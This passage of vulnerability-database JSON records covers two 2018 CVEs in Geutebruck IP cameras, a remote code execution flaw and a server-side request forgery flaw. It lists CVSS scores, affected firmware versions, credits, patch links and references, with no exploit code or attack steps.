            "id": "CVE-2018-7532"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam%2fefd-2250_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:topfd-2125_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003346"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Davy Douhine of RandoriSec and Nicolas Mattiocco of Greenlock.",
        "sources": [
          {
            "db": "BID",
            "id": "103474"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2018-7532",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2018-7532",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2018-06019",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "e2e6fb10-39ab-11e9-8292-000c29342cb1",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.2,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-137564",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2018-7532",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2018-7532",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2018-7532",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2018-06019",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201803-761",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "IVD",
                "id": "e2e6fb10-39ab-11e9-8292-000c29342cb1",
                "trust": 0.2,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-137564",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e6fb10-39ab-11e9-8292-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06019"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137564"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003346"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-761"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7532"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Unauthentication vulnerabilities have been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which may allow remote code execution. Geutebruck G-Cam/EFD-2250 and Topline TopFD-2125 Contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. GeutebruckIPCameras has a remote code execution vulnerability that an attacker can exploit to execute arbitrary code. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. \n1. An authentication-bypass vulnerability\n2. A SQL-injection vulnerability\n3. A cross-site request-forgery vulnerability\n4. An access-bypass vulnerability\n5. A security-bypass vulnerability\n6. A cross-site scripting vulnerability\nAttackers may exploit these issues to gain unauthorized access to the   affected device, or to bypass certain security restrictions to perform  unauthorized actions, to compromise the application to access or modify  data and to exploit vulnerabilities in the underlying database, to  execute arbitrary script code in the browser of an unsuspecting user in  the context of the affected site or to  execute arbitrary code within  the context of the  affected device. \nThe following devices are vulnerable:\nGeutebruck G-Cam/EFD-2250 version 1.12.0.4\nGeutebruck Topline TopFD-2125 version 3.15.1. Geutebr\u00fcck G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebr\u00fcck company",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-7532"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003346"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06019"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "IVD",
            "id": "e2e6fb10-39ab-11e9-8292-000c29342cb1"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137564"
          }
        ],
        "trust": 2.7
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-7532",
            "trust": 3.6
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-18-079-01",
            "trust": 3.4
          },
          {
            "db": "BID",
            "id": "103474",
            "trust": 2.0
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-761",
            "trust": 0.9
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06019",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003346",
            "trust": 0.8
          },
          {
            "db": "IVD",
            "id": "E2E6FB10-39AB-11E9-8292-000C29342CB1",
            "trust": 0.2
          },
          {
            "db": "VULHUB",
            "id": "VHN-137564",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e6fb10-39ab-11e9-8292-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06019"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137564"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003346"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-761"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7532"
          }
        ]
      },
      "id": "VAR-201803-2221",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "IVD",
            "id": "e2e6fb10-39ab-11e9-8292-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06019"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137564"
          }
        ],
        "trust": 1.7456349166666667
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT",
              "ICS",
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          },
          {
            "category": [
              "ICS"
            ],
            "sub_category": null,
            "trust": 0.2
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e6fb10-39ab-11e9-8292-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06019"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:53:17.778000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.geutebrueck.com/en_EN.html"
          },
          {
            "title": "Patch for Geutebruck IPCameras Remote Code Execution Vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/122847"
          },
          {
            "title": "Geutebr\u00fcck G-Cam/EFD-2250  and Topline TopFD-2125 Remediation measures for authorization problem vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79347"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-06019"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003346"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-761"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-287",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-137564"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003346"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7532"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.4,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-079-01"
          },
          {
            "trust": 1.7,
            "url": "http://www.securityfocus.com/bid/103474"
          },
          {
            "trust": 1.7,
            "url": "https://randorisec.fr/0day-anonymous-rce-on-geutebruck-ip-cameras-again/"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7532"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7532"
          },
          {
            "trust": 0.3,
            "url": "http://www.geutebrueck.com/en_en/product-overview-31934.html"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-06019"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137564"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003346"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-761"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7532"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "IVD",
            "id": "e2e6fb10-39ab-11e9-8292-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06019"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137564"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003346"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-761"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7532"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-03-22T00:00:00",
            "db": "IVD",
            "id": "e2e6fb10-39ab-11e9-8292-000c29342cb1"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-06019"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "VULHUB",
            "id": "VHN-137564"
          },
          {
            "date": "2018-03-20T00:00:00",
            "db": "BID",
            "id": "103474"
          },
          {
            "date": "2018-05-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-003346"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201803-761"
          },
          {
            "date": "2018-03-22T18:29:01.137000",
            "db": "NVD",
            "id": "CVE-2018-7532"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-06019"
          },
          {
            "date": "2019-10-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-137564"
          },
          {
            "date": "2018-03-20T00:00:00",
            "db": "BID",
            "id": "103474"
          },
          {
            "date": "2018-05-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-003346"
          },
          {
            "date": "2019-10-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201803-761"
          },
          {
            "date": "2024-11-21T04:12:18.600000",
            "db": "NVD",
            "id": "CVE-2018-7532"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-761"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Geutebruck IP Cameras Remote code execution vulnerability",
        "sources": [
          {
            "db": "IVD",
            "id": "e2e6fb10-39ab-11e9-8292-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06019"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "authorization issue",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-761"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201803-2210

    Vulnerability from variot - Updated: 2024-11-23 21:53

    A server-side request forgery vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which could lead to proxied network scans. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. There is a server-side request forgery vulnerability in GeutebruckIPCameras, which can be exploited by attackers. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. 1. An authentication-bypass vulnerability 2. A SQL-injection vulnerability 3. A cross-site request-forgery vulnerability 4. An access-bypass vulnerability 5. A security-bypass vulnerability 6. A cross-site scripting vulnerability Attackers may exploit these issues to gain unauthorized access to the affected device, or to bypass certain security restrictions to perform unauthorized actions, to compromise the application to access or modify data and to exploit vulnerabilities in the underlying database, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site or to execute arbitrary code within the context of the affected device. The following devices are vulnerable: Geutebruck G-Cam/EFD-2250 version 1.12.0.4 Geutebruck Topline TopFD-2125 version 3.15.1. Geutebrück G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebrück company. An attacker could exploit this vulnerability to scan proxy networks

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201803-2210",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-cam/efd-2250",
            "scope": "eq",
            "trust": 1.7,
            "vendor": "geutebruck",
            "version": "1.12.0.4"
          },
          {
            "model": "topfd-2125",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "geutebrueck",
            "version": "3.15.1"
          },
          {
            "model": "g-cam\\/efd-2250",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "geutebrueck",
            "version": "1.12.0.4"
          },
          {
            "model": "topline topfd-2125",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "geutebruck",
            "version": "3.15.1"
          },
          {
            "model": "topfd-2125",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "3.15.1"
          },
          {
            "model": "g-cam/efd-2250",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.19"
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "g cam efd 2250",
            "version": "1.12.0.4"
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "topfd 2125",
            "version": "3.15.1"
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e7221e-39ab-11e9-a995-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06022"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003342"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-765"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7516"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam%2fefd-2250_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:topfd-2125_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003342"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Davy Douhine of RandoriSec and Nicolas Mattiocco of Greenlock.",
        "sources": [
          {
            "db": "BID",
            "id": "103474"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2018-7516",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2018-7516",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2018-06022",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "e2e7221e-39ab-11e9-a995-000c29342cb1",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.2,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-137548",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "LOW",
                "baseScore": 7.3,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 3.9,
                "id": "CVE-2018-7516",
                "impactScore": 3.4,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2018-7516",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2018-7516",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2018-06022",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201803-765",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "IVD",
                "id": "e2e7221e-39ab-11e9-a995-000c29342cb1",
                "trust": 0.2,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-137548",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e7221e-39ab-11e9-a995-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06022"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137548"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003342"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-765"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7516"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A server-side request forgery vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which could lead to proxied network scans. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. There is a server-side request forgery vulnerability in GeutebruckIPCameras, which can be exploited by attackers. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. \n1. An authentication-bypass vulnerability\n2. A SQL-injection vulnerability\n3. A cross-site request-forgery vulnerability\n4. An access-bypass vulnerability\n5. A security-bypass vulnerability\n6. A cross-site scripting vulnerability\nAttackers may exploit these issues to gain unauthorized access to the   affected device, or to bypass certain security restrictions to perform  unauthorized actions, to compromise the application to access or modify  data and to exploit vulnerabilities in the underlying database, to  execute arbitrary script code in the browser of an unsuspecting user in  the context of the affected site or to  execute arbitrary code within  the context of the  affected device. \nThe following devices are vulnerable:\nGeutebruck G-Cam/EFD-2250 version 1.12.0.4\nGeutebruck Topline TopFD-2125 version 3.15.1. Geutebr\u00fcck G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebr\u00fcck company. An attacker could exploit this vulnerability to scan proxy networks",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-7516"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003342"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06022"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "IVD",
            "id": "e2e7221e-39ab-11e9-a995-000c29342cb1"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137548"
          }
        ],
        "trust": 2.7
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-7516",
            "trust": 3.6
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-18-079-01",
            "trust": 3.4
          },
          {
            "db": "BID",
            "id": "103474",
            "trust": 2.0
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-765",
